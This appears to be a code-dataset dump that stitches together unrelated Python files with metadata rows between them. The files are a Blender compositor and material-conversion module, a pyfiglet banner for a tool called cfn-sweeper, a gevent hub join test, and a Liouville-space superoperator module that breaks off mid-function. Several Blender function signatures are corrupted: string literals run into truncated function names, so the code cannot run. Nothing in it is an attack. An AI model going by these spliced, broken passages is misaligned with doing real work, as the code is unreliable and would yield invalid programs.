logger.info('create_additional_depth_output_nodes: Done')
return depth_image_output_node
def create_additional_mask_output_nodes(scene,
object_index,
output_path=None,
image_stem=None,
leading_zeroes_template='#####'):
logger.info('create_additional_mask_output_nodes: ...')
# Make sure that the render layer passes the object index
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
# Add additional pass values
# default_render_layer.use_pass_combined = True
# default_render_layer.use_pass_mist = True
# default_render_layer.use_pass_normal = True
# default_render_layer.use_pass_vector = True
# default_render_layer.use_pass_uv = True
default_render_layer.use_pass_object_index = True
# default_render_layer.use_pass_material_index = True
# default_render_layer.use_pass_shadow = True
# ========== IMPORTANT FOR TRANSPARENT MATERIALS =========
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
mask_node = scene_nodes.new('CompositorNodeIDMask')
mask_node.index = object_index
mask_node.use_antialiasing = True
image_output_node = scene_nodes.new('CompositorNodeOutputFile')
if output_path is not None:
image_output_node.base_path = output_path
if image_stem is not None:
image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(
default_render_layers_node.outputs['IndexOB'],
mask_node.inputs['ID value'])
scene_links.new(
mask_node.outputs['Alpha'],
image_output_node.inputs['Image'])
logger.info('create_additional_mask_output_nodes: Done')
return mask_node, image_output_node
def create_simple_material():
logger.info('Create Simple Material: ...')
simple_material = bpy.data.materials.new('simple_material')
simple_material.use_nodes = True
simple_material_nodes = simple_material.node_tree.nodes
simple_material_links = simple_material.node_tree.links
shader_node_diffuse_bsdf = simple_material_nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_diffuse_bsdf.inputs[0].default_value = [255,0,0, 1]
return simple_material
def enable_backdrop(enable=True):
logger.info('enable_backdrop: ...')
# Enable backdrop
for area in bpy.context.screen.areas:
if area.type == 'NODE_EDITOR':
for space in area.spaces:
if space.type == 'NODE_EDITOR':
logger.info('Backdrop Enabled')
space.show_backdrop = enable
break
logger.info('enable_backdrop: Done')
class NodeUtility:
USE_MAP_COLOR_DIFFUSE = 'use_map_color_diffuse'
USE_MAP_NORMAL = 'use_map_normal'
DIFFUSE_BSDF = 'Diffuse BSDF'
GLOSSY_BSDF = 'Glossy BSDF'
TRANSPARENT_BSDF = 'Transparent BSDF'
GLASS_BSDF = 'Glass BSDF'
EMISSION = 'Emission'
OBJECT_INFO = 'Object Info'
MATERIAL_OUTPUT = 'Material Output'
SHADER_NODE_RGB = 'ShaderNodeRGB'
SHADER_NODE_MIX_RGB = 'ShaderNodeMixRGB'
SHADER_NODE_EMISSION = 'ShaderNodeEmission'
SHADER_NODE_BSDF_GLASS = 'ShaderNodeBsdfGlass'
SHADER_NODE_OBJECT_INFO = 'ShaderNodeObjectInfo'
@staticmethod
def _collect_texture(type_to_texture_file_path, use_map_type, filepath):
logger.debug('filepath: ' + filepath)
if type_to_texture_file_path[use_map_type] is None:
type_to_texture_file_path[use_map_type] = filepath
else:
logger.warning('Two Textures with the same use_type:')
logger.warning('First: ' + use_map_type + ', ' + type_to_texture_file_path[use_map_type])
logger.warning('Second: ' + use_map_type + ', ' + filepath)
logger.warning('We use the first texture as : ' + use_map_type)
@staticmethod
def _get_blender_internal_texture_type_to_file_paths(material):
some_other_name = material.name
logger.debug(some_other_name)
# fprint('material: ' + material.name)
texture_name_set = set()
texture_type_to_file_path = defaultdict(lambda: None)
for texture_slot in material.texture_slots:
if texture_slot:
texture = texture_slot.texture
texture_name_set.add(texture)
# fprint('texture: ' + texture.name)
if hasattr(texture, 'image'):
logger.debug('Material: ' + material.name + ', Texture: ' + texture.name)
logger.debug('use_map_color_diffuse: ' + str(texture_slot.use_map_color_diffuse))
logger.debug('use_map_normal: ' + str(texture_slot.use_map_normal))
# ==== Remark ====
# Relative paths start with '//' and are relative to the blend file.
# The prefix of paths to textures packed inside the .blend file are dependent on the original
# file path. For example <blend_file_folder>/textures/texture_file.ext, i.e. look like the
# following '//textures/<texturename>.<textureextension>'
if texture.image.packed_file is not None:
logger.debug('Image is packed')
# If the texture is packed, the file is definitively valid, otherwise check the file
image_is_valid = True
else:
logger.debug('Image is an external source')
image_is_valid = os.path.isfile(bpy.path.abspath(texture.image.filepath))
if image_is_valid:
if texture_slot.use_map_color_diffuse:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_COLOR_DIFFUSE,
texture.image.filepath)
elif texture_slot.use_map_normal:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_NORMAL,
texture.image.filepath)
logger.info('texture_type_to_file_path: ' + str(texture_type_to_file_path))
return texture_type_to_file_path
@staticmethod
def replace_bsdf_node_in_material(material, old_node, new_node, preceding_node=None, next_node=None):
nodes = material.node_tree.nodes
links = material.node_tree.links
# we replace the oldf bsdf with a new one
nodes.remove(old_node)
if preceding_node is not None:
links.new(preceding_node.outputs[0], new_node.inputs[0])
if next_node is not None:
links.new(new_node.outputs[0], next_node.inputs[0])
@staticmethod
def create_material_nodes_for_cycle_using_blender_internal_textures(material_default_bsdf_type=DIFFUSE_BSDF,
transparent_default_bsdf_type=TRANSPARENT_BSDF):
"""
:param material_default_bsdf_type: DIFFUSE_BSDF or GLOSSY_BSDF
:param transparent_default_bsdf_type: TRANSPARENT_BSDF or GLASS_BSDF
:return:
"""
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: ...')
bpy.context.scene.render.engine = 'CYCLES'
# # each object has several material slots, which link to the materials provided in bpy.data.materials
# for material in bpy.data.materials:
for object in bpy.data.objects:
logger.debug('object.name: ' + object.name)
for material_slot in object.material_slots:
material = material_slot.material
# https://wiki.blender.org/index.php/Dev:Py/Scripts/Cookbook/Code_snippets/Nodes
logger.info('material.name: ' + material.name)
# change only blender internal materials (keep cycle materials as is)
if not material.use_nodes:
logger.debug('Adding nodes ...')
# this adds by default a node "Material Output" and a node "Diffuse BSDF"
material.use_nodes = True
# get the "Diffuse BSDF" node
nodes = material.node_tree.nodes
links = material.node_tree.links
# this diffuse node does automatically inherit the color of the material
shader_node_diffuse_bsdf = nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_material_output = nodes.get("Material Output")
# These texture file path should be valid
texture_type_to_file_path = NodeUtility._get_blender_internal_texture_type_to_file_paths(material)
# 1 Case: Material is just a texture
# Image Texture -> Diffuse BSDF/Glossy BSDF -> Material Output
color_texture_file_path = texture_type_to_file_path[NodeUtility.USE_MAP_COLOR_DIFFUSE]
logger.debug('color_texture_file_path: ' + str(color_texture_file_path))
if color_texture_file_path is not None:
logger.debug('Converting Material With Texture: ' + color_texture_file_path)
logger.debug('Texture path is valid')
# test if the image texture node has already been created
shader_node_tex_image = nodes.get("Image Texture")
if not shader_node_tex_image:
shader_node_tex_image = nodes.new(type='ShaderNodeTexImage')
shader_node_tex_image.image = bpy.data.images.load(color_texture_file_path)
# link the nodes
links.new(shader_node_tex_image.outputs[0], shader_node_diffuse_bsdf.inputs[0])
# if material_default_bsdf_type == BICyclesMaterialConverter.GLOSSY_BSDF:
#
# logger.debug('Replace Diffuse Material Node with Glossy Material Node' )
# shader_node_glossy_bsdf = nodes.get(BICyclesMaterialConverter.GLOSSY_BSDF)
# if not shader_node_glossy_bsdf:
#
# shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
#
# BICyclesMaterialConverter._replace_bsdf_node(material,
# old_node=shader_node_diffuse_bsdf,
# new_node=shader_node_glossy_bsdf,
# preceding_node=shader_node_tex_image,
# next_node=shader_node_material_output)
# 2 Case: Material is transparent
# RGB -> Transparent BSDF/Glass BSDF -> Material Output
elif material.use_transparency:
logger.debug('Converting Transparent Material')
shader_node_transparent_or_glass_bsdf = nodes.get(transparent_default_bsdf_type)
if not shader_node_transparent_or_glass_bsdf:
if transparent_default_bsdf_type == NodeUtility.GLASS_BSDF:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfGlass')
else:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfTransparent')
shader_node_RGB = nodes.new(type='ShaderNodeRGB')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_transparent_or_glass_bsdf,
preceding_node=shader_node_RGB,
next_node=shader_node_material_output)
else:
logger.debug('Converting Material With Simple Color')
# by default there is just a diffuse bsdf created using the color of the material
if material_default_bsdf_type == NodeUtility.GLOSSY_BSDF:
logger.debug('Replace Diffuse Material Node with Glossy Material Node')
shader_node_glossy_bsdf = nodes.get(NodeUtility.GLOSSY_BSDF)
if not shader_node_glossy_bsdf:
shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_glossy_bsdf,
preceding_node=None,
next_node=shader_node_material_output)
else:
logger.debug('Material has already a node ...')
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: Done')
| 43.804301
| 120
| 0.62276
|
import bpy
import os
from collections import defaultdict
from Utility.Logging_Extension import logger
you want to use this in a script you can press Control-C while your mouse is over the button to copy it to the
# clipboard.
# =================
# alternative approach (not tested yet)
# http://blender.stackexchange.com/questions/364/how-do-i-convert-materials-from-blender-internal-to-cycles
# https://blenderartists.org/forum/showthread.php?247271-Cycles-Automatic-Material-Textures-Node
def rearrange_nodes():
logger.info('rearrange_nodes: ...')
# TODO
# https://www.blendernation.com/2015/11/03/development-cleaning-up-node-trees/
# https://github.com/JuhaW/NodeArrange/blob/master/__init__.py
assert False
def create_viewer_node(scene, preceeding_node_name, preceeding_channel_name):
logger.info('create_viewer_node: ...')
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
mask_id_node = scene_nodes.get(preceeding_node_name)
viewer_node = scene_nodes.new('CompositorNodeViewer')
scene_links.new(mask_id_node.outputs[preceeding_channel_name],
viewer_node.inputs['Image'])
logger.info('create_viewer_node: Done')
def create_depth_viewer_node(scene):
logger.info('create_depth_output_nodes: ...')
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
# output_value = default_render_layers_node.outputs[output_type]
# print(type(output_value))
viewer_node = scene_nodes.get('Depth Viewer')
if viewer_node is None:
viewer_node = scene_nodes.new('CompositorNodeViewer')
viewer_node.name = 'Depth Viewer'
logger.vinfo('viewer_node.name', viewer_node.name)
viewer_node.use_alpha = False
output_type = 'Depth'
scene_links.new(
default_render_layers_node.outputs[output_type],
viewer_node.inputs[0]) # link Z to output
logger.info('create_depth_output_nodes: Done')
def create_additional_optical_flow_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='ate_additional_optical_flow_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.use_pass_vector = True
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_links = scene.node_tree.links
scene_nodes = scene.node_tree.nodes
default_render_layers_node = scene_nodes.get('Render Layers')
optical_flow_output_node = scene_nodes.new('CompositorNodeOutputFile')
optical_flow_output_node.format.file_format = 'OPEN_EXR'
#optical_flow_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
optical_flow_output_node.base_path = output_path
if image_stem is not None:
optical_flow_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Vector'],
optical_flow_output_node.inputs['Image'])
logger.info('create_additional_optical_flow_output_nodes: Done')
return optical_flow_output_node
def create_additional_depth_output_nodes(scene,
output_path=None,
image_stem=None,
leading_zeroes_template='ate_additional_depth_output_nodes: ...')
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
depth_image_output_node = scene_nodes.new('CompositorNodeOutputFile')
depth_image_output_node.format.file_format = 'OPEN_EXR'
depth_image_output_node.format.use_zbuffer = True # Store floats
if output_path is not None:
depth_image_output_node.base_path = output_path
if image_stem is not None:
depth_image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(default_render_layers_node.outputs['Depth'],
depth_image_output_node.inputs['Image'])
logger.info('create_additional_depth_output_nodes: Done')
return depth_image_output_node
def create_additional_mask_output_nodes(scene,
object_index,
output_path=None,
image_stem=None,
leading_zeroes_template='ate_additional_mask_output_nodes: ...')
# Make sure that the render layer passes the object index
default_render_layer = scene.render.layers.get(scene.render.layers.active.name)
# Add additional pass values
# default_render_layer.use_pass_combined = True
# default_render_layer.use_pass_mist = True
# default_render_layer.use_pass_normal = True
# default_render_layer.use_pass_vector = True
# default_render_layer.use_pass_uv = True
default_render_layer.use_pass_object_index = True
# default_render_layer.use_pass_material_index = True
# default_render_layer.use_pass_shadow = True
# ========== IMPORTANT FOR TRANSPARENT MATERIALS =========
default_render_layer.pass_alpha_threshold = 0
scene.use_nodes = True
scene_nodes = scene.node_tree.nodes
scene_links = scene.node_tree.links
default_render_layers_node = scene_nodes.get('Render Layers')
mask_node = scene_nodes.new('CompositorNodeIDMask')
mask_node.index = object_index
mask_node.use_antialiasing = True
image_output_node = scene_nodes.new('CompositorNodeOutputFile')
if output_path is not None:
image_output_node.base_path = output_path
if image_stem is not None:
image_output_node.file_slots[0].path = image_stem + leading_zeroes_template
scene_links.new(
default_render_layers_node.outputs['IndexOB'],
mask_node.inputs['ID value'])
scene_links.new(
mask_node.outputs['Alpha'],
image_output_node.inputs['Image'])
logger.info('create_additional_mask_output_nodes: Done')
return mask_node, image_output_node
def create_simple_material():
logger.info('Create Simple Material: ...')
simple_material = bpy.data.materials.new('simple_material')
simple_material.use_nodes = True
simple_material_nodes = simple_material.node_tree.nodes
simple_material_links = simple_material.node_tree.links
shader_node_diffuse_bsdf = simple_material_nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_diffuse_bsdf.inputs[0].default_value = [255,0,0, 1]
return simple_material
def enable_backdrop(enable=True):
logger.info('enable_backdrop: ...')
# Enable backdrop
for area in bpy.context.screen.areas:
if area.type == 'NODE_EDITOR':
for space in area.spaces:
if space.type == 'NODE_EDITOR':
logger.info('Backdrop Enabled')
space.show_backdrop = enable
break
logger.info('enable_backdrop: Done')
class NodeUtility:
USE_MAP_COLOR_DIFFUSE = 'use_map_color_diffuse'
USE_MAP_NORMAL = 'use_map_normal'
DIFFUSE_BSDF = 'Diffuse BSDF'
GLOSSY_BSDF = 'Glossy BSDF'
TRANSPARENT_BSDF = 'Transparent BSDF'
GLASS_BSDF = 'Glass BSDF'
EMISSION = 'Emission'
OBJECT_INFO = 'Object Info'
MATERIAL_OUTPUT = 'Material Output'
SHADER_NODE_RGB = 'ShaderNodeRGB'
SHADER_NODE_MIX_RGB = 'ShaderNodeMixRGB'
SHADER_NODE_EMISSION = 'ShaderNodeEmission'
SHADER_NODE_BSDF_GLASS = 'ShaderNodeBsdfGlass'
SHADER_NODE_OBJECT_INFO = 'ShaderNodeObjectInfo'
@staticmethod
def _collect_texture(type_to_texture_file_path, use_map_type, filepath):
logger.debug('filepath: ' + filepath)
if type_to_texture_file_path[use_map_type] is None:
type_to_texture_file_path[use_map_type] = filepath
else:
logger.warning('Two Textures with the same use_type:')
logger.warning('First: ' + use_map_type + ', ' + type_to_texture_file_path[use_map_type])
logger.warning('Second: ' + use_map_type + ', ' + filepath)
logger.warning('We use the first texture as : ' + use_map_type)
@staticmethod
def _get_blender_internal_texture_type_to_file_paths(material):
some_other_name = material.name
logger.debug(some_other_name)
# fprint('material: ' + material.name)
texture_name_set = set()
texture_type_to_file_path = defaultdict(lambda: None)
for texture_slot in material.texture_slots:
if texture_slot:
texture = texture_slot.texture
texture_name_set.add(texture)
# fprint('texture: ' + texture.name)
if hasattr(texture, 'image'):
logger.debug('Material: ' + material.name + ', Texture: ' + texture.name)
logger.debug('use_map_color_diffuse: ' + str(texture_slot.use_map_color_diffuse))
logger.debug('use_map_normal: ' + str(texture_slot.use_map_normal))
# ==== Remark ====
# Relative paths start with '//' and are relative to the blend file.
# The prefix of paths to textures packed inside the .blend file are dependent on the original
# file path. For example <blend_file_folder>/textures/texture_file.ext, i.e. look like the
# following '//textures/<texturename>.<textureextension>'
if texture.image.packed_file is not None:
logger.debug('Image is packed')
# If the texture is packed, the file is definitively valid, otherwise check the file
image_is_valid = True
else:
logger.debug('Image is an external source')
image_is_valid = os.path.isfile(bpy.path.abspath(texture.image.filepath))
if image_is_valid:
if texture_slot.use_map_color_diffuse:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_COLOR_DIFFUSE,
texture.image.filepath)
elif texture_slot.use_map_normal:
NodeUtility._collect_texture(texture_type_to_file_path,
NodeUtility.USE_MAP_NORMAL,
texture.image.filepath)
logger.info('texture_type_to_file_path: ' + str(texture_type_to_file_path))
return texture_type_to_file_path
@staticmethod
def replace_bsdf_node_in_material(material, old_node, new_node, preceding_node=None, next_node=None):
nodes = material.node_tree.nodes
links = material.node_tree.links
# we replace the oldf bsdf with a new one
nodes.remove(old_node)
if preceding_node is not None:
links.new(preceding_node.outputs[0], new_node.inputs[0])
if next_node is not None:
links.new(new_node.outputs[0], next_node.inputs[0])
@staticmethod
def create_material_nodes_for_cycle_using_blender_internal_textures(material_default_bsdf_type=DIFFUSE_BSDF,
transparent_default_bsdf_type=TRANSPARENT_BSDF):
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: ...')
bpy.context.scene.render.engine = 'CYCLES'
# # each object has several material slots, which link to the materials provided in bpy.data.materials
# for material in bpy.data.materials:
for object in bpy.data.objects:
logger.debug('object.name: ' + object.name)
for material_slot in object.material_slots:
material = material_slot.material
# https://wiki.blender.org/index.php/Dev:Py/Scripts/Cookbook/Code_snippets/Nodes
logger.info('material.name: ' + material.name)
# change only blender internal materials (keep cycle materials as is)
if not material.use_nodes:
logger.debug('Adding nodes ...')
# this adds by default a node "Material Output" and a node "Diffuse BSDF"
material.use_nodes = True
# get the "Diffuse BSDF" node
nodes = material.node_tree.nodes
links = material.node_tree.links
# this diffuse node does automatically inherit the color of the material
shader_node_diffuse_bsdf = nodes.get(NodeUtility.DIFFUSE_BSDF)
shader_node_material_output = nodes.get("Material Output")
# These texture file path should be valid
texture_type_to_file_path = NodeUtility._get_blender_internal_texture_type_to_file_paths(material)
# 1 Case: Material is just a texture
# Image Texture -> Diffuse BSDF/Glossy BSDF -> Material Output
color_texture_file_path = texture_type_to_file_path[NodeUtility.USE_MAP_COLOR_DIFFUSE]
logger.debug('color_texture_file_path: ' + str(color_texture_file_path))
if color_texture_file_path is not None:
logger.debug('Converting Material With Texture: ' + color_texture_file_path)
logger.debug('Texture path is valid')
# test if the image texture node has already been created
shader_node_tex_image = nodes.get("Image Texture")
if not shader_node_tex_image:
shader_node_tex_image = nodes.new(type='ShaderNodeTexImage')
shader_node_tex_image.image = bpy.data.images.load(color_texture_file_path)
# link the nodes
links.new(shader_node_tex_image.outputs[0], shader_node_diffuse_bsdf.inputs[0])
# if material_default_bsdf_type == BICyclesMaterialConverter.GLOSSY_BSDF:
#
# logger.debug('Replace Diffuse Material Node with Glossy Material Node' )
# shader_node_glossy_bsdf = nodes.get(BICyclesMaterialConverter.GLOSSY_BSDF)
# if not shader_node_glossy_bsdf:
#
# shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
#
# BICyclesMaterialConverter._replace_bsdf_node(material,
# old_node=shader_node_diffuse_bsdf,
# new_node=shader_node_glossy_bsdf,
# preceding_node=shader_node_tex_image,
# next_node=shader_node_material_output)
# 2 Case: Material is transparent
# RGB -> Transparent BSDF/Glass BSDF -> Material Output
elif material.use_transparency:
logger.debug('Converting Transparent Material')
shader_node_transparent_or_glass_bsdf = nodes.get(transparent_default_bsdf_type)
if not shader_node_transparent_or_glass_bsdf:
if transparent_default_bsdf_type == NodeUtility.GLASS_BSDF:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfGlass')
else:
shader_node_transparent_or_glass_bsdf = nodes.new(type='ShaderNodeBsdfTransparent')
shader_node_RGB = nodes.new(type='ShaderNodeRGB')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_transparent_or_glass_bsdf,
preceding_node=shader_node_RGB,
next_node=shader_node_material_output)
else:
logger.debug('Converting Material With Simple Color')
# by default there is just a diffuse bsdf created using the color of the material
if material_default_bsdf_type == NodeUtility.GLOSSY_BSDF:
logger.debug('Replace Diffuse Material Node with Glossy Material Node')
shader_node_glossy_bsdf = nodes.get(NodeUtility.GLOSSY_BSDF)
if not shader_node_glossy_bsdf:
shader_node_glossy_bsdf = nodes.new(type='ShaderNodeBsdfGlossy')
NodeUtility.replace_bsdf_node_in_material(material,
old_node=shader_node_diffuse_bsdf,
new_node=shader_node_glossy_bsdf,
preceding_node=None,
next_node=shader_node_material_output)
else:
logger.debug('Material has already a node ...')
logger.info('create_material_nodes_for_cycle_using_blender_internal_textures: Done')
| true
| true
|
1c40faaf42dbbc4233733833e983cceebe86327e
| 575
|
py
|
Python
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 9
|
2021-08-20T17:09:40.000Z
|
2021-08-23T18:17:25.000Z
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 5
|
2021-08-20T16:58:42.000Z
|
2022-01-31T21:37:56.000Z
|
cfn_sweeper/artwork.py
|
rileydakota/cfn-sweeper
|
0f76aed79e1200e006322b2b0371475a3fd7e475
|
[
"MIT"
] | 1
|
2022-02-01T14:28:33.000Z
|
2022-02-01T14:28:33.000Z
|
from re import X
from pyfiglet import Figlet
class Artwork():
def art():
f = Figlet(font='larry3d')
print("\n https://github.com/rileydakota/cfn-sweeper" )
print (f.renderText('CFN SWEEPER \n'))
print((" The umanaged resource detector tool!").center(20))
print(("-----------------------------------------------------------").center(24, " "))
print((" Run Report").center(20))
print(("-----------------------------------------------------------").center(24, " "))
| 47.916667
| 96
| 0.405217
|
from re import X
from pyfiglet import Figlet
class Artwork():
def art():
f = Figlet(font='larry3d')
print("\n https://github.com/rileydakota/cfn-sweeper" )
print (f.renderText('CFN SWEEPER \n'))
print((" The umanaged resource detector tool!").center(20))
print(("-----------------------------------------------------------").center(24, " "))
print((" Run Report").center(20))
print(("-----------------------------------------------------------").center(24, " "))
| true
| true
|
1c40fb60855ff8ad9cbd7cc279f358bfd6c110bb
| 304
|
py
|
Python
|
greentest/test_hub_join.py
|
davidbalbert/gevent3000
|
3c940dbb2804ec7fe9001758d339eeb423793a28
|
[
"MIT"
] | 1
|
2017-01-04T10:58:59.000Z
|
2017-01-04T10:58:59.000Z
|
greentest/test_hub_join.py
|
hewigovens/gevent-for-ios
|
0ef7b67497297b71ed71bca068e56bc103df9069
|
[
"MIT"
] | 1
|
2019-04-24T06:29:29.000Z
|
2019-04-24T06:29:29.000Z
|
greentest/test_hub_join.py
|
davidbalbert/gevent3000
|
3c940dbb2804ec7fe9001758d339eeb423793a28
|
[
"MIT"
] | null | null | null |
import gevent
# hub.join() guarantees that loop has exited cleanly
res = gevent.get_hub().join()
assert res is True, res
res = gevent.get_hub().join()
assert res is True, res
# but it is still possible to use gevent afterwards
gevent.sleep(0.01)
res = gevent.get_hub().join()
assert res is True, res
| 20.266667
| 52
| 0.730263
|
import gevent
res = gevent.get_hub().join()
assert res is True, res
res = gevent.get_hub().join()
assert res is True, res
gevent.sleep(0.01)
res = gevent.get_hub().join()
assert res is True, res
| true
| true
|
1c40fcbd5a8dba2b2a356b28ee8871a2e93137ee
| 19,573
|
py
|
Python
|
lime/superoperator.py
|
binggu56/lime
|
07f60c5105f0bedb11ac389fd671f4f1737a71fe
|
[
"MIT"
] | 4
|
2020-01-15T11:52:23.000Z
|
2021-01-05T19:40:36.000Z
|
lime/superoperator.py
|
binggu56/scitools
|
3f7ce3d8411a23186c73f1bb87a8778e039fbd0b
|
[
"MIT"
] | null | null | null |
lime/superoperator.py
|
binggu56/scitools
|
3f7ce3d8411a23186c73f1bb87a8778e039fbd0b
|
[
"MIT"
] | 3
|
2020-02-14T07:10:44.000Z
|
2021-04-14T17:49:45.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 25 22:01:00 2020
@author: Bing
Modules for computing signals with superoperator formalism in Liouville space
Instead of performing open quantum dynamics, the Liouvillian is directly diagonalized
Possible improvements:
1. merge the Qobj class with QUTIP
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import kron, identity, issparse
from scipy.sparse.linalg import eigs
import scipy
import math
from numba import jit
from numpy import exp
from lime.phys import dag, pauli
from lime.mol import Result
# from qutip import Qobj as Basic
def liouvillian(H, c_ops):
'''
Construct the Liouvillian out of the Hamiltonian and collapse operators
Parameters
----------
H : TYPE
DESCRIPTION.
c_ops : TYPE
DESCRIPTION.
Returns
-------
l : TYPE
DESCRIPTION.
'''
# dissipator = 0.
if c_ops is None:
c_ops = []
l = -1j * operator_to_superoperator(H)
for c_op in c_ops:
l = l + lindblad_dissipator(c_op)
# l = operator_to_superoperator(H) + 1j * dissipator
return l
class Qobj():
def __init__(self, data=None, dims=None):
"""
Class for quantum operators: is this useful?
Parameters
----------
n : int
size of Hilbert space.
Returns
-------
None.
"""
# Basic.__init__(self, dims=dims, inpt=data)
self.dims = dims
self.data = data
if data is None:
self.data = np.random.randn(*dims)
self.shape = self.data.shape
return
def dot(self, b):
return Qobj(np.dot(self.data, b.data))
def conjugate(self):
return np.conjugate(self.data)
def to_vector(self):
return operator_to_vector(self.data)
def to_super(self, type='commutator'):
return operator_to_superoperator(self.data, type=type)
def to_linblad(self, gamma=1.):
l = self.data
return gamma * (kron(l, l.conj()) - \
operator_to_superoperator(dag(l).dot(l), type='anticommutator'))
def liouville_space(N):
"""
constuct liouville space out of N Hilbert space basis |ij>
"""
return
def operator_to_vector(rho):
"""
transform an operator/density matrix to an superoperator in Liouville space
Parameters
----------
A : TYPE
DESCRIPTION.
Returns
-------
None.
"""
if isinstance(rho, np.ndarray):
return rho.flatten()
else:
return rho.toarray().flatten()
def dm2vec(rho):
"""
transform an operator/density matrix to a vector in Liouville space
Parameters
----------
A : TYPE
DESCRIPTION.
Returns
-------
None.
"""
if issparse(rho):
n, m = rho.shape
return rho.tolil().reshape((n*m, 1))
else:
return rho.flatten()
# def vec2dm(rho):
# """
# transform an operator/density matrix to a vector in Liouville space
# Parameters
# ----------
# A : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
# if isinstance(rho, np.ndarray):
# return np.reshape()
# else:
# return rho.toarray().flatten()
def op2sop(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def to_super(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def vec2mat_index(N, I):
"""
Convert a vector index to a matrix index pair that is compatible with the
vector to matrix rearrangement done by the vec2mat function.
From Qutip.
"""
j = int(I / N)
i = I - N * j
return i, j
def mat2vec_index(N, i, j):
"""
Convert a matrix index pair to a vector index that is compatible with the
matrix to vector rearrangement done by the mat2vec function.
From Qutip.
"""
return i + N * j
def operator_to_superoperator(a, kind='commutator'):
"""
promote an operator/density matrix to an superoperator in
Liouville space
Parameters
----------
A : TYPE
DESCRIPTION.
Returns
-------
None.
"""
N = a.shape[-1]
idm = identity(N)
if kind in ['commutator', 'c', '-']:
return kron(a, idm) - kron(idm, a.T)
elif kind in ['left', 'l']:
# elementwise operator for defining the commutator
# for n in range(N2):
# i, j = divmod(n, N)
# for m in range(N2):
# k, l = divmod(m, N)
# am[n, m] = a[i, k] * idm[j,l]
return kron(a, idm)
elif kind in ['right', 'r']:
return kron(idm, a.T)
elif kind in ['anticommutator', 'a', '+']:
return kron(a, idm) + kron(idm, a.T)
else:
raise ValueError('Error: superoperator {} does not exist.'.format(kind))
def lindblad_dissipator(l):
return kron(l, l.conj()) - 0.5 *\
operator_to_superoperator(dag(l).dot(l), kind='anticommutator')
# return gamma * (left(l).dot(right(dag(l))) - 0.5 *\
# operator_to_superoperator(dag(l).dot(l), type='anticommutator'))
def left(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(a, idm)
def right(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(idm, a.T)
def kraus(a):
"""
Kraus superoperator a rho a^\dag = a^\dag_R a_L
Parameters
----------
a : TYPE
DESCRIPTION.
Returns
-------
TYPE
DESCRIPTION.
"""
al = left(a)
ar = right(dag(a))
return ar.dot(al)
# def obs(rho, a):
# """
# Return expectation value of a for rho in Liouville space.
# Parameters
# ----------
# rho : TYPE
# DESCRIPTION.
# a : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
# idv = operator_to_vector(np.identity(a.shape[-1]))
# return np.vdot(idv, left(a).dot(rho))
# @jit
def obs(rho, a):
return np.vdot(operator_to_vector(dag(a)), rho)
def trace(rho):
n = math.isqrt(len(rho))
return np.vdot(operator_to_vector(np.identity(n)), rho)
def resolvent(omega, L):
'''
Resolvent of the Lindblad quantum master equation
Parameters
----------
omega : TYPE
DESCRIPTION.
L : 2d array
full liouvillian
Returns
-------
None.
'''
idm = np.identity(L.shape[0])
return np.linalg.inv(omega * idm - L)
def _correlation_2p_1f(omegas, rho0, ops, L):
a, b = ops
out = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
